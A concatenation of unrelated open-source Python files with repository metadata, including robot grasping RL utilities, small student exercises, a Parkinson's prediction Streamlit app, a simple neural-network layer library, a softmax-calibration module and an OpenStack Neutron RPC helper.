gripper_traj_lines(poses_[7], traj_state, gripper_along=gripper_along) line_colors = [[255, 255, 0], [0, 0, 255]] traj_lines = [gripper_lines, ef_lines] rgb = renderer.vis(poses_2, list(range(10)), shifted_pose=np.eye(4), interact=interact, V=np.array(V), visualize_context={ "white_bg": True, "project_point": [point[:3]], "project_color": [point_color], "static_buffer": True, "reset_line_point": True, "line": traj_lines, "line_color": line_colors, } ) else: rgb = renderer.vis(poses_2, list(range(10)), shifted_pose=np.eye(4), interact=interact, V=np.array(V), visualize_context={ "white_bg": True, "project_point": [point[:3]], "project_color": [point_color], "static_buffer": True, "reset_line_point": True, "thickness": [2] } ) return rgb def vis_point(renderer, point_state, window_name='test', interact=1, curr_joint=None, grasp=None, V=None): """visualize single point state """ if type(point_state) is torch.Tensor: point_state = point_state.detach().cpu().numpy() vis_points = point_state.copy() pt_color = get_point_color(vis_points) if V is None: V = [[ 0.3021, 0.668, 0.6801, 0. ], [-0.7739, -0.2447, 0.5841, 0. ], [ 0.5566, -0.7028, 0.4431, 1.1434], [ 0., 0., 0., 1. ]] line, line_color = [], [] cls_indexes, poses = [], [] if grasp is not None: line_starts, line_ends = grasp_gripper_lines(unpack_pose_rot_first(grasp.detach().cpu().numpy())[None]) line = [(line_starts[0], line_ends[0])] line_color = [[255, 255, 0]] return renderer.vis( poses, cls_indexes, shifted_pose=np.eye(4), interact=interact, V=np.array(V), visualize_context={ "white_bg": True, "project_point": [vis_points[:3] ], "project_color": [pt_color], "point_size": [3], "reset_line_point": True, "static_buffer": True, "line": line, "line_color": line_color, } ) def compose_state_traj(data_list, CONFIG, step=0): """downsampling traj """ downsample_length = (len(data_list[0]) - step) // int(CONFIG.sparsify_traj_ratio) idx = list(np.linspace(step, len(data_list[0]) - 1, downsample_length).astype(np.int)) torch_data_list = [] for data_idx, data in enumerate(data_list): torch_data_list.append(torch.from_numpy(np.stack([data[i] for i in idx], axis=0)).cuda().float()) return torch_data_list def update_expert_traj(agent, expert_data_list, cfg, step=0, remote=False): """ compute expert traj latent embedding """ expert_exec_traj = compose_state_traj(expert_data_list, cfg.RL_TRAIN, step) if remote: recons_traj = agent.select_traj.remote(None, expert_data_list[0][step][None], None, vis=False, remain_timestep=cfg.RL_MAX_STEP, curr_joint=expert_data_list[1][step][None], gt_traj=expert_exec_traj) # generate the traj latent else: recons_traj = agent.select_traj(None, expert_data_list[0][step][None], None, vis=False, remain_timestep=cfg.RL_MAX_STEP, curr_joint=expert_data_list[1][step][None], gt_traj=expert_exec_traj) # generate the traj latent return expert_exec_traj, recons_traj, expert_exec_traj[3].detach().cpu().numpy() def get_gaddpg(path=None, load_joint_trained_model=False): """ get pretrained GA-DDPG Models """ from core.ddpg import DDPG gaddpg_dict = edict() gaddpg_dict = edict(yaml.load(open("output/demo_model/config.yaml", "r"))) net_dict = make_nets_opts_schedulers(gaddpg_dict.RL_MODEL_SPEC, gaddpg_dict.RL_TRAIN) gaddpg = DDPG(512, PandaTaskSpace6D(), gaddpg_dict.RL_TRAIN) gaddpg.setup_feature_extractor(net_dict, True) gaddpg.load_model('output/demo_model') gaddpg.set_mode(True) return gaddpg def proj_point_img(img, K, offset_pose, points=None, color=(255, 0, 0), vis=False, neg_y=True, traj=None, joint_output=False, last_joint=None, remain_timestep=-1, gt_goal=None, traj_offset_pose=None, extra_text=None, model_name=None, vis_traj_gradient_color=False): # draw traj lines, goal / actions predictions and texts in image plane target_mask = get_target_mask(points) obs_mask = get_obs_mask(points) robot_mask = get_robot_mask(points) colors = [[0, 255, 0], [255, 0, 0], [0, 0, 255]] img = img.copy() # point first for i, mask in enumerate([target_mask, obs_mask, robot_mask]): points_i = points[:, mask] points_xyz = points_i[:3] xyz_points = offset_pose[:3, :3].dot(points_xyz) + offset_pose[:3, [3]] if neg_y: xyz_points[:2] *= -1 x, y, valid_idx_mask = valid_3d_to_2d(K, xyz_points, img) img[y[valid_idx_mask], x[valid_idx_mask]] = colors[i] if traj_offset_pose is None: traj_offset_pose = offset_pose if traj is not None and traj[0] is not None: if (remain_timestep == -1 or len(traj) == remain_timestep) and type(traj) is not list: line_colors = [[255, 255, 0], [0, 255, 255]] traj_lines = gripper_traj_lines(traj_offset_pose, traj, joint_output) else: if type(traj) is list: traj_num = len(traj) remain_timestep = len(traj[0]) traj[0] = traj[0][:,:7] traj = np.concatenate(traj, axis=0) else: traj_num = int(len(traj) / remain_timestep) remain_timestep = int(remain_timestep) traj_lines = [] hues = np.linspace(0., 5./6, traj_num ) colors = np.stack([colorsys.hsv_to_rgb(hue, 1.0, 1.0) for hue in hues]) * 255 line_colors = np.repeat(colors, 2, axis=0) for i in range(traj_num): traj_lines.extend(gripper_traj_lines(traj_offset_pose, traj[i*remain_timestep:(i+1)*remain_timestep ] )) for line_i, lines in enumerate(traj_lines): lines = np.array(lines) if len(lines) == 0: continue if neg_y: lines[:, :2] *= -1 p_xyz = np.matmul(K, lines) x, y = (p_xyz[:,0] / p_xyz[:,2]).astype(np.int), (p_xyz[:,1] / p_xyz[:,2]).astype(np.int) x = np.clip(x, 0, img.shape[0] - 1) y = np.clip(y, 0, img.shape[1] - 1) for i in range(x.shape[1]): # avoid clipping issues color = line_colors[line_i] color = (int(color[0]), int(color[1]), int(color[2])) if np.abs(x[0, i] - x[1, i]) > 100 or np.abs(y[0, i] - y[1, i]) > 100: continue if line_i == 1 and len(traj_lines) > 4 and not vis_traj_gradient_color: cv2.line(img, (x[0, i], y[0, i]), (x[1, i], y[1, i]), color, 2) else: cv2.line(img, (x[0, i], y[0, i]), (x[1, i], y[1, i]), color, 1) if extra_text is not None: img = add_extra_text(img, extra_text, 1.5) # 0.7 return img def draw_grasp_img(img, pose, K, offset_pose, color=(0, 0, 255), vis=False, neg=True ): img_cpy = img.copy() line_index = [[0, 1, 1, 2, 3], [1, 2, 3, 4, 5]] hand_anchor_points = grasp_points_from_pose(pose, offset_pose) if neg: hand_anchor_points[:2] *= -1 p_xyz = K.dot(hand_anchor_points) x, y = (p_xyz[0] / p_xyz[2]).astype(np.int), (p_xyz[1] / p_xyz[2]).astype(np.int) x = np.clip(x, 0, img.shape[0] - 1) y = np.clip(y, 0, img.shape[1] - 1) for i in range(len(line_index[0])): pt1 = (x[line_index[0][i]], y[line_index[0][i]]) pt2 = (x[line_index[1][i]], y[line_index[1][i]]) cv2.line(img_cpy, pt1, pt2, color, 2) return img_cpy def remove_robot_pt(points): return points[..., :-500] def reparameterize(mu, logsigma, truncated=True, fix_eps=None): std = torch.exp(logsigma) if truncated: eps = sample_gaussian(std.shape, truncate_std=2.).cuda() else: eps = torch.randn_like(std) if fix_eps is not None: eps = fix_eps return mu + eps * std def has_check(x, prop): return hasattr(x, prop) and getattr(x, prop) def check_scene(env, state=None, start_rot=None, object_performance=None, planner=None, scene_name=None, run_iter=0, check_ik=False, CONFIG=None, load_test_scene=False): """ check if a scene is valid by its distance, view, hand direction, target object state, and object counts """ if load_test_scene : return name_check(env, object_performance, run_iter) MAX_TEST_PER_OBJ = CONFIG.max_test_per_obj pose_flag = pose_check(env, state, start_rot, CONFIG) name_flag = name_check(env, object_performance, run_iter, MAX_TEST_PER_OBJ) collision_flag = not env.collided check_flag = pose_flag and name_flag and collision_flag if check_flag and check_ik: goal_validity = planner.expert_plan(return_success=True, check_scene=True) if not goal_validity: return False return check_flag def sample_scene(env, planner, object_performance=None, scene_file=None, run_iter=0, CONFIG=None, timeout=6.): """ sample scenes with ik filtering """ state = None MAX_TEST_PER_OBJ = CONFIG.max_test_per_obj start_time = time.time() outer_cnt, inner_cnt = CONFIG.scene_sample_check_ik_cnt, CONFIG.scene_sample_inner_cnt if CONFIG.index_file == 'filter_shapenet.json': inner_cnt *= 3 for _ in range(outer_cnt): for _ in range(inner_cnt): if time.time() - start_time > timeout: return state, False flag = not test_cnt_check(env, object_performance, run_iter, MAX_TEST_PER_OBJ) if flag: break state = env.reset( scene_file=None, init_joints=rand_sample_joint(env, None, CONFIG.ENV_NEAR, CONFIG.ENV_FAR), reset_free=True, enforce_face_target=True ) cur_ef_pose = env._get_ef_pose(mat=True) flag = check_scene(env, state, cur_ef_pose[:3, :3], object_performance, planner, scene_file, run_iter, False, CONFIG) if flag: break if flag and check_scene(env, state, cur_ef_pose[:3, :3], object_performance, planner, scene_file, run_iter, True, CONFIG): break return state, flag def select_target_point(state, target_pt_num=1024): """get target point cloud from scene point cloud """ point_state = state[0][0] target_mask = get_target_mask(point_state) point_state = point_state[:4, target_mask] gripper_pc = point_state[:4, :6] point_num = min(point_state.shape[1], target_pt_num) obj_pc = regularize_pc_point_count(point_state.T, point_num, False).T point_state = np.concatenate((gripper_pc, obj_pc), axis=1) return [(point_state, state[0][1])] + state[1:] def gaddpg_action(gaddpg, state, action, episode_steps, max_steps, curr_joint, return_goal=False): """apply GA-DDPG action """ state = select_target_point(state) if state[0][0].shape[1] > 0: gaddpg_remain_step = max(min(max_steps-episode_steps + 1, 30), 1) print('use gaddpg remaining step: {}...'.format(gaddpg_remain_step)) action, _, _, aux_pred = gaddpg.select_action(state, remain_timestep=gaddpg_remain_step, curr_joint=curr_joint) if return_goal: return action, aux_pred return action return np.zeros(6), np.ones(7) * 0.01 class PandaTaskSpace6D(): def __init__(self): self.high = np.array([0.1, 0.1, 0.1, np.pi/6, np.pi/6, np.pi/6]) self.low = np.array([-0.1, -0.1, -0.1, -np.pi/6, -np.pi/6, -np.pi/6]) self.shape = [6] self.bounds = np.vstack([self.low, self.high]) class RobotMLP(nn.Module): """ simple Pointnet-Like MLP """ def __init__(self, in_channels, out_channels, dim=1, gn=False, gn_num=16): super(RobotMLP, self).__init__() if dim == 1: conv = nn.Conv1d if gn: bn = lambda k: nn.GroupNorm(gn_num, k) else: bn = nn.BatchNorm1d else: raise ValueError if not isinstance(out_channels, (list, tuple)): out_channels = [out_channels] layers = [] for oc in out_channels: layers.extend([ conv(in_channels, oc, 1), bn(oc), nn.ReLU(True), ]) in_channels = oc self.layers = nn.Sequential(*layers) def forward(self, inputs, masks=None): inp_shape = inputs.shape inputs = inputs.view(-1, inputs.shape[-2], inputs.shape[-1]) x = self.layers(inputs) x = torch.max(x, 2, keepdim=True)[0] x = x.view(len(x), -1) return x def clean_dir(dst_dir): if os.path.exists(dst_dir): os.system('rm -rf {}/*'.format(dst_dir)) def get_usage_and_success(): """Get gpu and memory usages as well as current performance """ GPUs = GPUtil.getGPUs() memory_usage = psutil.virtual_memory().percent gpu_usage = max([GPU.memoryUsed for GPU in GPUs]) return memory_usage, gpu_usage def get_model_path(output_dir, name, env_name, surfix): actor_path = "{}/{}_actor_{}_{}".format( output_dir, name, env_name, surfix ) critic_path = "{}/{}_critic_{}_{}".format( output_dir, name, env_name, surfix ) traj_feat_path = "{}/{}_traj_feat_{}_{}".format( output_dir, name, env_name, surfix ) traj_sampler_path = "{}/{}_traj_sampler_{}_{}".format( output_dir, name, env_name, surfix ) state_feat_path = "{}/{}_state_feat_{}_{}".format( output_dir, name, env_name, surfix ) return actor_path, critic_path, traj_feat_path, traj_sampler_path, state_feat_path def count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad) def get_loss_info_dict(): return { 'bc_loss': deque([0], maxlen=50), 'policy_grasp_aux_loss': deque([0], maxlen=50), 'critic_gaddpg_loss': deque([0], maxlen=100), 'critic_loss': deque([0], maxlen=100), 'kl_loss': deque([0], maxlen=50), 'sampler_grasp_aux_loss': deque([0], maxlen=50), 'sampler_bc_loss': deque([0], maxlen=50), 'traj_latent_loss': deque([0], maxlen=50), 'gaddpg_loss': deque([0], maxlen=50), 'reward_mask_num': deque([0], maxlen=5), 'expert_reward_mask_num': deque([0], maxlen=5), 'value_mean': deque([0], maxlen=5), 'return_mean': deque([0], maxlen=5), 'gaddpg_pred_mean': deque([0], maxlen=5), 'traj_grad': deque([0], maxlen=5), 'traj_param': deque([0], maxlen=5), 'policy_param': deque([0], maxlen=5), 'sampler_mean': deque([0], maxlen=5), 'traj_num': deque([0], maxlen=5), 'sampler_logsigma': deque([0], maxlen=5), 'policy_grad': deque([0], maxlen=5), 'feat_grad': deque([0], maxlen=5), 'feat_param': deque([0], maxlen=5), 'val_feat_grad': deque([0], maxlen=5), 'val_feat_param': deque([0], maxlen=5), 'critic_grad': deque([0], maxlen=5), 'critic_param': deque([0], maxlen=5), 'train_batch_size': deque([0], maxlen=5), } def flip(x, dim): indices = [slice(None)] * x.dim() indices[dim] = torch.arange(x.size(dim) - 1, -1, -1, dtype=torch.long, device=x.device) return x[tuple(indices)] def create_bottleneck(input_size, latent_size): logmu = nn.Linear(input_size, latent_size) logvar = nn.Linear(input_size, latent_size) return nn.ModuleList([logmu, logvar]) def get_policy_class(policy_net_name, args): policy = getattr(core.networks, policy_net_name)( args.num_inputs, args.action_dim, args.hidden_size, args.action_space, extra_pred_dim=args.extra_pred_dim, config=args, ).to('cuda') policy_optim = Adam( policy.parameters(), lr=args.lr, eps=1e-5, weight_decay=1e-5 ) policy_scheduler = torch.optim.lr_scheduler.MultiStepLR( policy_optim, milestones=args.policy_milestones, gamma=args.lr_gamma) policy_target = getattr(core.networks, policy_net_name)( args.num_inputs, args.action_dim, args.hidden_size, args.action_space, extra_pred_dim=args.extra_pred_dim, config=args, ).to('cuda') return policy, policy_optim, policy_scheduler, policy_target def get_critic(args): model = core.networks.ResidualQNetwork if has_check(args, 'dense_critic') else core.networks.QNetwork critic = model( args.critic_num_input, args.critic_value_dim, args.hidden_size, extra_pred_dim=args.critic_extra_pred_dim, ).cuda() critic_optim = Adam( critic.parameters(), lr=args.value_lr, eps=1e-5, weight_decay=1e-5 ) critic_scheduler = torch.optim.lr_scheduler.MultiStepLR( critic_optim, milestones=args.value_milestones, gamma=args.value_lr_gamma, ) critic_target = model( args.critic_num_input, args.critic_value_dim, args.hidden_size, extra_pred_dim=args.critic_extra_pred_dim, ).cuda() return critic, critic_optim, critic_scheduler, critic_target
liruiw/HCG
core/utils.py
utils.py
py
48,148
python
en
code
13
github-code
36
24593511416
# 4. Write a program that converts some amount of money from USD to BYN, # ask a user for the amount, store the ratio inside the program itself. usd = input("Enter the amount in US dollars:\n ") try: usd = float(usd) except ValueError: print("Data entry error.") exit() exchange_rates = 3.05 byn = usd * exchange_rates print(f"{usd} US dollars are equal {byn} Belarusian rubles")
MikitaTsiarentsyeu/Md-PT1-69-23
Tasks/Voltov/Task1/task4.py
task4.py
py
392
python
en
code
0
github-code
36
10353313162
import streamlit as st import pickle model_random = pickle.load(open("model/forest.pkl", "rb")) from utils import head, body hasil = head() if st.button("Submit"): name, MDVP_FO,MDVP_FHI, MDVP_FloHz,MDVP_JitterPercent,MDVP_JitterAbs, MDVP_RAP, MDVP_PPQ,Jitter_DDP,MDVP_Shimmer,MDVP_ShimmerDb,Shimmer_APQ3, Shimmer_APQ5, MDVP_APQ,Shimmer_DDA,NHR, HNR, RPDE, DFA, spread1,spread2, D2, PPE = hasil input_model = [[MDVP_FO,MDVP_FHI, MDVP_FloHz,MDVP_JitterPercent,MDVP_JitterAbs, MDVP_RAP, MDVP_PPQ,Jitter_DDP,MDVP_Shimmer,MDVP_ShimmerDb,Shimmer_APQ3, Shimmer_APQ5, MDVP_APQ,Shimmer_DDA,NHR, HNR, RPDE, DFA, spread1,spread2, D2, PPE]] hasil_prediksi = model_random.predict(input_model)[0] status = {0:"Healthy", 1:"Parkinsson"} body("Result : "+ " " + name + " current status is " + status[hasil_prediksi])
FathanKhansaArby/FinalProject083
app/main.py
main.py
py
833
python
en
code
0
github-code
36
70987576744
#!/usr/bin/python2.7 import rospy from sensor_msgs.msg import Image import cv2 from cv_bridge import CvBridge bridge = CvBridge() def show_webcam(): cam = cv2.VideoCapture(0) if not cam.isOpened(): raise IOError("Cannot open webcam") while True: ret_val, img = cam.read() cv2.imshow("webcam", img) img_message = bridge.cv2_to_imgmsg(img, encoding="passthrough") pub.publish(img_message) key = cv2.waitKey(1) if key == 27: break cam.release() cv2.destroyAllWindows() pub = rospy.Publisher("/usb_cam/image_raw", Image, queue_size=1) rospy.init_node("img_publisher", anonymous=True) show_webcam() '''rate = rospy.Rate(1) while not rospy.is_shutdown(): img = cv2.imread("/home/wout/Pictures/arucotest.jpg") img_message = bridge.cv2_to_imgmsg(img, encoding="passthrough") pub.publish(img_message) rate.sleep() '''
E-pep/HaldisBot
catkin_ws/src/Line_Follower_pkg/imgPub.py
imgPub.py
py
924
python
en
code
1
github-code
36
21165644420
#!/usr/bin/env python3 # -*- coding: utf-8 -*- from matrix import * from rand import rand_normal class Dense: """全连接层 Args: input_num: 输入节点数 units: 输出节点数 Attributes: inputs: 输入 inputs_grad: 输入的梯度 units: 输出节点数 kernel: 权值 kernel_grad: 权值的梯度 bias: 偏置 bias_grad: 偏置的梯度 lr: 学习率 y: 输出 """ def __init__(self, input_num, units): self.inputs = None self.inputs_grad = None self.units = units self.kernel = reshape([x / 10 for x in rand_normal(input_num * units)], input_num, units) self.kernel_grad = [[0] * units for _ in range(input_num)] self.bias = [0] * units self.bias_grad = [0] * units self.lr = 0 self.y = None def forward(self, inputs): """前向传播 Args: inputs: 输入 Returns: 前向传播时层的输出 """ self.inputs = inputs self.inputs_grad = inputs self.y = accord(dot(inputs, self.kernel), [self.bias] * len(inputs), '+') return self.y def backward(self, delta): """反向传播,并执行参数更新 Args: delta: 误差 Returns: 输入的梯度 """ self.bias_grad = each(sum_axis(delta, axis=0), lambda x: x / len(delta)) self.kernel_grad = each(dot(transpose(self.inputs), delta), lambda x: x / len(delta)) self.inputs_grad = dot(delta, transpose(self.kernel)) self.kernel = accord(self.kernel, each(self.kernel_grad, lambda x: -1 * x * self.lr), '+') self.bias = accord(self.bias, each(self.bias_grad, lambda x: -1 * x * self.lr), '+') return self.inputs_grad class Sigmoid: """Sigmoid激活层 Attributes: inputs: 输入 inputs_grad: 输入的梯度 y: 输出 """ E = 2.71828182846 def __init__(self): self.inputs = None self.inputs_grad = None self.y = [] @staticmethod def _sigmoid(inputs): """sigmoid函数 f(x) = 1 / (1 + exp(-x)) Args: inputs: 输入自变量 Returns: sigmoid计算的结果 """ return each(inputs, lambda x: 1 / (1 + __class__.E ** (-1 * x))) def forward(self, inputs): """前向传播 Args: inputs: 输入 Returns: 输出 """ self.inputs = inputs self.inputs_grad = inputs self.y = __class__._sigmoid(inputs) return self.y def backward(self, delta): """反向传播 Args: delta: 误差 Returns: 输入的梯度 """ sig = __class__._sigmoid(self.inputs) self.inputs_grad = accord(delta, accord(sig, each(sig, lambda x: 1 - x), '*'), '*') return self.inputs_grad class L2Loss: """平方损失层 Attributes: pred: 预测值(每个分类的确信度) pred_grad: 预测值的梯度 label: 标签(标记的每个分类的确信度) loss: 损失值 """ def __init__(self): self.pred = None self.pred_grad = None self.label = None self.loss = 0 def forward(self, pred, target): """前向传播 Args: pred: 预测值 target: 目标(是哪个分类) Returns: 损失值 """ self.pred = pred self.pred_grad = pred self.label = reshape([0] * len(pred) * len(pred[0]), len(pred), len(pred[0])) for a, b in zip(self.label, target): a[b] = 1 self.loss = sum(sum_axis(each(accord(pred, self.label, '-'), lambda x: x ** 2), axis=0)) / (2 * len(pred)) return self.loss def backward(self): """反向传播 Returns: 预测值的梯度 """ self.pred_grad = each(accord(self.pred, self.label, '-'), lambda x: x / len(self.pred)) return self.pred_grad
straicat/data-mining-assignment
layer.py
layer.py
py
4,131
python
en
code
0
github-code
36
7998654007
def Theory(): t = str(input("이론값을 입력해주십시오 : ")) if not isfloat(t) or float(t) <= 0: return Theory() else: return float(t) def Experiment(): e = str(input("실험값을 입력해주십시오 : ")) if not isfloat(e) or float(e) < 0: return Experiment() else: return float(e) def isfloat(s): (m,_,n) = s.partition(".") return (m.isdigit() and (n.isdigit() or n=="")) or m=="" and n.isdigit() def main(): print("오차율 계산 프로그램입니다.") r1 = Theory() r2 = Experiment() result = abs(r1-r2)/r1 * 100 print("오차율은 " + str(round(result,4)) + "%입니다.") a = str(input("더 계산해드릴까요?(Y를 치시면 다시, 다른 문자를 치시면 프로그램이 종료됩니다.) : ")) if a == "Y": main() else: print("안녕히가세요") main()
kyj0701/SoftWare2017
error.py
error.py
py
822
python
ko
code
0
github-code
36
15975975433
# *-* coding: utf-8 *-* """ Created on sam 22 mai 2021 19:11:56 CEST @author : vekemans """ import numpy as np from numpy.fft import \ rfft,irfft,fftfreq,\ rfft2,irfft2,rfftfreq from scipy import sparse from scipy.interpolate import interp2d import matplotlib import matplotlib.pyplot as plt nfig = 1 import cahn_hilliard as ch import cahn_hilliard_sd as chs range_n = 2**np.arange(2,11) error_fd = np.zeros(range_n.shape) error_rk4 = np.zeros(range_n.shape) error_bdf_ab = np.zeros(range_n.shape) n_ref = 2*range_n[-1] time = 1e-4 # c0 = np.random.random(n_ref*n_ref)*2 -1 # c0 = c0.reshape((n_ref,n_ref)) c0 = np.ones((n_ref,n_ref)) c0[:n_ref//4,:] = -1 c0[3*n_ref//4:,:] = -1 c0[:,:n_ref//4] = -1 c0[:,3*n_ref//4:] = -1 sim = iter(chs.simulate(c0,n_ref,time)) next(sim); sol = next(sim) x = np.arange(0,1,step=1/n_ref) # c0_interpolation = interp2d(x,x,c0, kind='cubic') sol_interpolation = interp2d(x,x,sol, kind='linear') for i,n in enumerate(range_n): x = np.arange(0,1,step=1/n)[:n] # c0 = c0_interpolation(x,x) c0 = np.ones((n,n)) c0[:n//4,:] = -1 c0[3*n//4:,:] = -1 c0[:,:n//4] = -1 c0[:,3*n//4:] = -1 sim = iter(ch.simulate(c0.flatten(),n,time)) next(sim); guess = next(sim) error_fd[i] = ((guess-sol_interpolation(x,x))**2).mean()**0.5 sim = iter(chs.simulate(c0,n,time,temp_scheme='rk4')) next(sim); guess = next(sim) error_rk4[i] = ((guess-sol_interpolation(x,x))**2).mean()**0.5 sim = iter(chs.simulate(c0,n,time)) next(sim); guess = next(sim) error_bdf_ab[i] = ((guess-sol_interpolation(x,x))**2).mean()**0.5 fig = plt.figure(nfig) plt.plot(range_n,error_fd,ls='-',marker='o',markersize=8, label='FD EE') plt.plot(range_n,error_rk4,ls=':',marker='v',markersize=8, label='Spectral RK4') plt.plot(range_n,error_bdf_ab,ls='--',marker='^',markersize=8, label='Spectral BDF/AB') # plt.xticks([2,4,6,8,10],labels=[r'$2^{%d}$' %i for i in [2,4,6,8,10]]) plt.legend(loc='best'); plt.xscale('log', base=2); plt.yscale('log') plt.xlabel('n'); plt.ylabel(r'L2 norm error at $t=10^{%d}$ [s]' %(round(np.log(time)/np.log(10)))) plt.grid(which='major',axis='both',color='xkcd:grey',linestyle='--',linewidth=0.8) plt.grid(which='minor',axis='y',color='xkcd:grey',linestyle='--',linewidth=0.8) fig.tight_layout() print(np.log(error_bdf_ab[-2]/error_bdf_ab[-1])/np.log(2)) fig.savefig('../figs/convergence.pdf') plt.show()
abbarn/lmeca2300
project/pylib/convergence.py
convergence.py
py
2,416
python
en
code
0
github-code
36
38688339389
import torch from utils.metrics import AURC import numpy as np from utils.measures import MSP def centralize(y:torch.tensor): return y-(y.mean(-1).view(-1,1)) def p_norm(y:torch.tensor,p, eps:float = 1e-12): if p is None or p == 0: return torch.ones(y.size(0),1,device=y.device) else: return y.norm(p=p,dim=-1).clamp_min(eps).view(-1,1) def beta_heuristic(y:torch.tensor,p): if p==0 or p is None: return 1 return (p_norm(y,p).mean()) def beta_generalized_mean(n,p): if p==0 or p is None: return 1 else: return (n*np.math.factorial(p))**(1/p) def pNormSoftmax(y:torch.tensor,p,beta= None, out = 'MSP'): '''Implement pNormSoftmax (centralize the logits, p-normalize, scale by beta and apply MSP). If beta is None, defines beta as the heuristic beta (mean of the p-norms). If out is passes as 'logits', return the normalized logits (skip MSP)''' y = centralize(y) norm = p_norm(y,p) if beta is None: beta = norm.mean() if out == 'logits': return y.mul(beta).div(norm) else: return MSP(y.mul(beta).div(norm)) class optimize: '''Gradient methods could be used, but a grid search on a small set of p's show to be strongly efficient for pNormSoftmax optimization. Also, AURC and AUROC are not differentiable''' p_range = torch.arange(8) T_range = torch.arange(0.01,2,0.01) @staticmethod def p_and_beta(logits,risk,metric = AURC,p_range = p_range,T_range =T_range): vals = optimize.p_T_grid(logits,risk,metric,p_range,T_range) p,T = np.unravel_index(np.argmin(vals),np.shape(vals)) p = p_range[p] T = T_range[T] return p,beta_heuristic(logits,p)/T @staticmethod def p(logits, risk,metric = AURC,p_range = p_range, heuristic = True): if heuristic: beta = None else: beta = 1.0 vals = optimize.p_grid(logits,risk,metric,p_range, beta) p = p_range[np.argmin(vals)] return p @staticmethod def T(logits, risk,metric = AURC,T_range = T_range): vals = optimize.T_grid(logits,risk,metric,T_range) return T_range[np.argmin(vals)] @staticmethod def T_grid(logits,risk,metric = AURC,T_range = T_range): vals = [] for T in T_range: vals.append(metric(risk,MSP(logits.div(T))).item()) return vals @staticmethod def p_grid(logits,risk,metric = AURC,p_range = p_range, beta = None): vals = [] for p in p_range: vals.append(metric(risk,pNormSoftmax(logits,p,beta)).item()) return vals @staticmethod def p_T_grid(logits,risk,metric = AURC,p_range = p_range,T_range = T_range): vals = [] for p in p_range: vals_T = optimize.T_grid(pNormSoftmax(logits,p,None,'logits'),risk,metric,T_range) vals.append(vals_T) return vals @staticmethod def T_fromloss(logits,labels,loss = torch.nn.CrossEntropyLoss(),T_range = T_range): vals = optimize.T_grid_fromloss(logits,labels,loss,T_range) return T_range[np.argmin(vals)] @staticmethod def T_grid_fromloss(logits,labels,loss = torch.nn.CrossEntropyLoss(),T_range = T_range): vals = [] for T in T_range: vals.append(loss(logits.div(T),labels).item()) return vals def optimal_pNormSoftmax(z:torch.tensor,risk:torch.tensor,metric = AURC,optimize_beta = False,**kwargs): if optimize_beta: p,beta = optimize.p_and_beta(z,risk,metric,**kwargs) else: p = optimize.p(z, risk,metric, **kwargs) beta = beta_heuristic(z,p) return pNormSoftmax(z,p,beta)
lfpc/pNormSoftmax
pNormSoftmax.py
pNormSoftmax.py
py
3,632
python
en
code
1
github-code
36
74457197862
import json import os import sys import time from apscheduler.schedulers.blocking import BlockingScheduler from public import redis_con,get_conn from data_change import get_setting # 将数据查询到redis中 def get_data(): con = get_conn() cur = con.cursor() sql = f"SELECT id,title,Ncontent from {get_setting()} where is_change=0 LIMIT 50000" num = cur.execute(sql) results = cur.fetchall() if num != 0: for res in results: res = json.dumps(list(res)) redis_con().lpush('data_all',res) return True return False def chat(): if redis_con().exists('data_all') == 1: if redis_con().llen('data_all') < 5000: result = get_data() if result is True: print('更新数据成功') print(f"总数据{redis_con().llen('data_all')}") return True print(f"总数据{redis_con().llen('data_all')}") result = get_data() if result is True: print('更新数据成功') print(f"总数据{redis_con().llen('data_all')}") return True return False if __name__ == '__main__': # scheduler = BlockingScheduler() # scheduler.add_job(chat, 'cron', minute =1,timezone='Asia/Shanghai') # scheduler.start() # # chat() while True: res = chat() if res is False: sys.exit(0) # 终止运行 time.sleep(3600)
AYongmengnan/zimeiti
zimeiti/get_data_redis.py
get_data_redis.py
py
1,434
python
en
code
0
github-code
36
35376239294
# time-dependent solutions for P_00(t), P_01(t), and P_10(t) and P_01(t) # taken from Anderson 2017 Lecture Notes on Stochastic Processes with Applications in Biology # P_00(t) is the chance of being in the inactive state at t=t, given being in the inactive state at t=0 # or P_00(t) = P(x_t = 0 | x_0 = 0) with x=0 is being inactive and x=1 is being inactive # restrictions P_00(t) + P_01(t) = 1 # and P_10(t) + P_11(t) = 1 import numpy as np import matplotlib.pyplot as plt def p_00(k_on, k_off, t): la = k_on mu = k_off ret_val = mu/(mu + la) + la/(mu + la) * np.exp(-(mu + la)*t) return ret_val def p_10(k_on, k_off, t): la = k_on mu = k_off ret_val = mu/(mu + la) - mu/(mu + la) * np.exp(-(mu + la)*t) return ret_val def create_transition_chances(k_on, k_off): wins = [j*15 for j in range(0, 9)] p_00s = [] p_10s = [] for t in wins: p_00s.append(p_00(k_on, k_off, t)) p_10s.append(p_10(k_on, k_off, t)) p_01s = [1 - p for p in p_00s] p_11s = [1 - p for p in p_10s] return wins, (p_00s, p_10s, p_01s, p_11s) def plot_transition_chances(k_on, k_off, wins, p_00s, p_10s, p_01s, p_11s): plt.plot(wins, p_00s, 'o-', label="P_00") plt.plot(wins, p_10s, 'o-', label="P_10") plt.plot(wins, p_01s, 'o-', label="P_01") plt.plot(wins, p_11s, 'o-', label="P_11") title = "k_on={k_on};k_off={k_off}. Chances of being in state x_t given state x_0," \ " with e.g. P_00 = P(x_t=0 | x_0=0)".\ format(k_on=k_on, k_off=k_off) plt.title(title) plt.ylim(0, 1) plt.legend() plt.xlabel("time in minutes") plt.ylabel("chance") plt.show() plt.close(1) k_on = 0.01 k_off = 0.04 wins, (p_00s, p_10s, p_01s, p_11s) = create_transition_chances(k_on=k_on, k_off=k_off) plot_transition_chances(k_on, k_off, wins, p_00s, p_10s, p_01s, p_11s)
resharp/scBurstSim
solution/nonstat_markov.py
nonstat_markov.py
py
1,894
python
en
code
3
github-code
36
932629353
import datetime from neutron.common import rpc as proxy from neutron.openstack.common import log as logging LOG = logging.getLogger(__name__) class HeloAgentNotifyAPI(proxy.RpcProxy): """API for plugin to ping agent.""" BASE_RPC_API_VERSION = '1.0' def __init__(self, topic=None, version=None): if version: super(HeloAgentNotifyAPI, self).__init__( topic=topic, default_version=version) else: super(HeloAgentNotifyAPI, self).__init__( topic=topic, default_version=self.BASE_RPC_API_VERSION) def helo_agent_host(self, context, host, topic): """Notify the agent on host.""" data = 0 try: data = self.call( context, self.make_msg('helo', time=datetime.datetime.utcnow()), timeout = 3, topic='%s.%s' % (topic, host)) except Exception: LOG.exception(_("Failed to helo %(topic)s on %(host)s"), {"topic": topic, "host": host}) return data class HeloRpcCallbackMixin(object): def helo(self, context, time): LOG.debug(time) return 1
CingHu/neutron-ustack
